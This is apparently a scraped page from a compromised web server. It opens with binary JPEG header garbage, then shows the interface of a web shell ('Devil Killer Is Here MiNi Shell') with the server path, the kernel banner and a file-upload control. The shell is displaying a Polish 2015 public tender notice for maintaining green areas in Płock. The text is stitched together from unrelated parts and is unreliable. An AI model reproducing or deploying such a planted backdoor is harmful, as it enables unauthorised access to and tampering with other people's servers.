JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150429/99352-N-2015.html

<p class="kh_header"><b>Płock: Konserwacja zieleni na terenach stanowiących własność i współwłasność Gminy - Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o. o. w Płocku</b><br>
<b>Numer ogłoszenia: 99352 - 2015; data zamieszczenia: 29.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 24 3640310, faks 24 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością ze 100% udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja zieleni na terenach stanowiących własność i współwłasność Gminy - Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o. o. w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na prowadzeniu zabiegów pielęgnacyjnych zieleni i obejmuje  trzy części: CZĘŚĆ I KOSZENIE TRAWY, CIĘCIE I ODCHWASZCZANIE ŻYWOPŁOTÓW, ODCHWASZCZANIE RABAT I TRAWNIKÓW WOKÓŁ NICH. CZEŚĆ II  CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW ORAZ NASADZENIA DRZEW. CZEŚĆ III  WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH.

Prace wykonywane będą na terenach stanowiących własność i współwłasność Gminy - Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej TBS Sp. z o. o. w Płocku  Rejon Obsługi Mieszkańców Nr III, IV , V. Termin realizacji zamówienia od dnia podpisania umowy do dnia  10.11.2015 r.
ZAKRES ZADANIA CZĘŚĆ I: KOSZENIE TRAWY, CIĘCIE I ODCHWASZCZANIE ŻYWOPŁOTÓW, ODCHWASZCZANIE RABAT I TRAWNIKÓW WOKÓŁ NICH. 1.Utrzymanie trawników , koszenie trawy wraz z uprzątnięciem i załadowaniem do podstawionego pojemnika/kontenera na odpady zielone, łącznie do 892.550,00 m2, po uzgodnieniu z Zamawiającym w zależności od wzrostu trawy.  2.Pielęgnacja żywopłotów , cięcie i odchwaszczanie żywopłotów wraz z uprzątnięciem                      i załadowaniem do podstawionego pojemnika/kontenera na odpady zielone, łącznie: cięcie żywopłotów: do  20.705,00 mb, odchwaszczanie żywopłotów: do  20.705,00 mb
 po uzgodnieniu z Zamawiającym w zależności od wzrostu żywopłotu oraz chwastów. 3. Pielęgnacja rabat, odchwaszczanie rabat i trawników wokół nich wraz z uprzątnięciem                     i załadowaniem do podstawionego pojemnika/kontenera na odpady zielone, łącznie do 10.555,00 m2, po uzgodnieniu z Zamawiającym w zależności od wzrostu chwastów.
UWAGA:Wykonawca zobowiązany jest do zgłoszenia Zamawiającemu co najmniej na 2 dni przed terminem rozpoczęcia prac w zakresie utrzymania trawników i pielęgnacji rabat oraz pielęgnacji żywopłotów, konieczności zamówienia pojemników/kontenerów na odpady zielone ze wskazaniem miejsc oraz szczegółowych terminów ich podstawienia. Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu. Powierzchnie trawników, rabat oraz długości żywopłotów zostaną każdorazowo określone przez Zamawiającego w zleceniu. Zamawiający zastrzega sobie prawo do zmian powierzchni terenu zielonego przeznaczonego do koszenia trawy oraz zmian ilości mb żywopłotu do cięcia, zmian ilości mb odchwaszczania żywopłotów, zmian ilości m2 odchwaszczania rabat, z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, a także potrzeb Zamawiającego wynikających m.in. z właściwości przyrody (tempo wzrostu roślin, itp). W tym zakresie Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego i rzeczowego. Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Do wykonywania robót związanych z cięciem trawy i żywopłotów należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ Wykonanie i odbiór robót zgodnie ze SPECYFIKACJĄ TECHNICZNĄ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ

ZAKRES ZADANIA   CZĘŚĆ II: CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW ORAZ NASADZENIA DRZEW. 1.Cięcia pielęgnacyjne (cięcia prześwietlające, sanitarne, korygujące, odmładzające i formujące) i cięcia techniczne (cięcia techniczne wzdłuż ciągów komunikacyjnych, w energetyce i telekomunikacji, w budownictwie) w koronie drzew. 2.Nasadzenia drzew w ramach rekompensaty za usunięte drzewa, na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska - Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. UWAGA: KORONA DRZEW POWINNA BYĆ UFORMOWANA NA WYSOKOŚCI: 2,20 DO 2,50 M. 3.Dokonanie nasadzeń drzew - sposób rozliczania nasadzeń  wg katalogu KNR Nr 2) 21 Tereny zieleni MGPiB 2005 r. Materiał do nasadzeń powinien odpowiadać normie: PN)R)87023 Materiał szkółkarski. Ozdobne drzewa i krzewy liściaste oraz PN )R-65022 Materiał siewny. Nasiona roślin rolniczych. Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: a) Cięcia pielęgnacyjne i techniczne w koronie drzew do 52 szt. b) Nasadzenia drzew do 67 szt. c)Uprzątnięcie, wywóz i utylizacja odpadów powstałych w wyniku wykonywania prac wymienionych w punkcie a),b).
UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji  lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie.Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu.Ilości i gatunki drzew zostaną każdorazowo określone przez Zamawiającego w zleceniu.Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części II zamówienia.
Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty.Wykonawca udzieli co najmniej 1 roku okresu gwarancji na przedmiotowe zadanie. Do wykonywania robót związanych z cięciem pielęgnacyjnym i cięciem technicznym w koronie drzew oraz nasadzeniem drzew należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT Załącznik             nr 9 do SIWZ
Wykonanie i odbiór robót zgodnie ze SPECYFIKACJĄ TECHNICZNĄ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ. WYKAZ GATUNKÓW I ODMIAN DRZEW DO NASADZENIA WRAZ Z DANYMI TECHNICZNYMI :  Nazwy gatunku, odmiany: Głóg pośredni Paul s Scarlett)obwód pnia mierzony na wysokości 100 cm min.16-18 cm szt.12 Klon pospolity  Royal Red obwód pnia mierzony na wysokości 100 cmmin.16 - 18 cm szt. 2, Klon kulisty
obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 14, Robinia akacjowa Umbraculifera
obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 3, Grusza drobnolistna Chanticleer
obwód pnia mierzony na wysokości 100 cmmin.16 - 18 cm szt. 16, Wiśnia kanzan obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 2,Brzoza Doorembos obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt.4, Lipa drobnolistna Greenspire obwód pnia mierzony na wysokości 100 cm min.16 cm - 18 cm szt. 5, Jarząb pospolity  obwód pnia mierzony na wysokości 100 cm min.16 - 18 cm szt. 9. Razem 67 szt.  ZAKRES ZADANIA CZĘŚĆ III: WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH. 1. Wycinka drzew oraz frezowanie karp korzeniowych wg potrzeb zgłaszanych przez Rejony Obsługi Mieszkańców. 2.Wycinka drzew na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. 3. Wyrównanie terenu, a w razie konieczności uzupełnienie ubytków ziemią i jej ubicie wraz z uprzątnięciem, wywiezieniem i utylizacją odpadów powstałych w wyniku wykonywania prac wymienionych w punkcie 1.  Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: Wycinka drzew ok. 49 sztuk, Frezowanie karp korzeniowych  ok. 49 sztuk  UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie. Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu.Wykonawca udzieli co najmniej 1 roku okresu gwarancji na przedmiotowe zadanie. Ilości i gatunki drzew zostaną każdorazowo określone przez Zamawiającego w zleceniu. Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części III zamówienia.Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Do wykonywania robót związanych z usunięciem drzew  należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT  Załącznik nr 9 do SIWZ Wykonanie i odbiór robót zgodnie ze SPECYFIKACJĄ TECHNICZNĄ WYKONANIA I ODBIORU ROBÓT Załącznik nr 9 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca Przystępując do przetargu jest zobowiązany wnieść wadium w wysokości 
na Część I   	-     	4.000,00    złotych (słownie: cztery tysiące złotych)
na Część II 	-     	   800,00    złotych (słownie: osiemset złotych)
na Część III	-	   500,00    złotych (słownie: pięćset złotych)
Łącznie wadium dla wszystkich Części zamówienia: 5.300,00 zł (pięć tysięcy trzysta złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie dotyczy Części I, Części II, Części III.
Na podstawie oświadczenia w trybie art. 44 w związku z art. 22 ust.1 Pzp.

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia, nie 	spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca  wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
a)	jedną usługę polegającą na cięciu trawy, cięciu żywopłotów  o wartości co najmniej 80.000,00 zł brutto  dotyczy Części I,
b)	jedną usługę w zakresie zabiegów pielęgnacyjnych w drzewostanie, a także nasadzenia drzew  o wartości co najmniej 20.000,00 zł brutto dotyczy Części II
c)	jedną usługę w zakresie wycinki drzew i frezowania karp korzeniowych o wartości co najmniej 10.000,00 zł brutto dotyczy Części III
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie spełnia, nie 	spełnia, na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie dotyczy Części I, Części II, Części III.
Na podstawie oświadczenia w trybie art. 44 w związku z art. 22 ust.1 Pzp.

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia, nie 	spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:
Część I
a)	dysponują co najmniej 3 osobami zdolnymi do realizacji usługi w zakresie cięcia trawy, cięcia i odchwaszczania żywopłotów oraz odchwaszczania rabat i trawników wokół nich
b)	dysponują co najmniej 1 przewidzianą do kierowania pracami objętymi przedmiotem zamówienia.
Część II
a)	co najmniej 1 osobą przewidzianą do kierowania pracami objętymi przedmiotem zamówienia, posiadającą wykształcenie wyższe lub średnie kierunkowe: architektura krajobrazu lub ogrodnictwo lub leśnictwo i minimum 12 miesięczne doświadczenie w wykonywaniu prac związanych z gospodarką zieleni. Dodatkowo osoba ta powinna posiadać zezwolenie lub zaświadczenie Konserwatora Zabytków na prowadzenie prac w strefie ochrony konserwatorskiej.
b)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych I stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
c)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych II stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
d)	co najmniej 1 osobą z wykształceniem ogrodniczym lub leśnym i minimum 12 miesięcznym doświadczeniem w wykonywaniu prac ogrodniczych.
Część III
a)	co najmniej 1 osobą przewidzianą do kierowania pracami objętymi przedmiotem zamówienia, posiadającą wykształcenie wyższe lub średnie kierunkowe: architektura krajobrazu lub ogrodnictwo lub leśnictwo i minimum 12 miesięczne doświadczenie w wykonywaniu prac związanych z gospodarką zieleni. Dodatkowo osoba ta powinna posiadać zezwolenie lub zaświadczenie Konserwatora Zabytków na prowadzenie prac w strefie ochrony konserwatorskiej.
b)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych I stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
c)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych II stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
d)	co najmniej 2 osobami z wykształceniem ogrodniczym lub leśnym i minimum 12 miesięcznym doświadczeniem w wykonywaniu prac ogrodniczych.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie spełnia, nie 	spełnia, na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada:
a)	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż cena oferty	
Uwaga:
1.	W przypadku złożenia oferty na wszystkie Części zamówienia lub na dane wybrane Części zamówienia Zamawiający dopuszcza złożenie jednej polisy, której kwota obejmuje  łączna cenę oferty.
2.	W przypadku złożenia przez Wykonawców polisy o której mowa w pkt 4a) zawierającej kwoty wyrażone w innych walutach niż PLN, dla potrzeb oceny spełniania warunku, Zamawiający, jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu na portalu Urzędu Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu na portalu Urzędu Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu na portalu Urzędu Zamówień Publicznych, w którym zostanie on opublikowany.
3.	W przypadku opłacenia składki polisy w ratach Wykonawca załącza dowód opłacenia rat polisy.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie spełnia, nie 	spełnia, na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
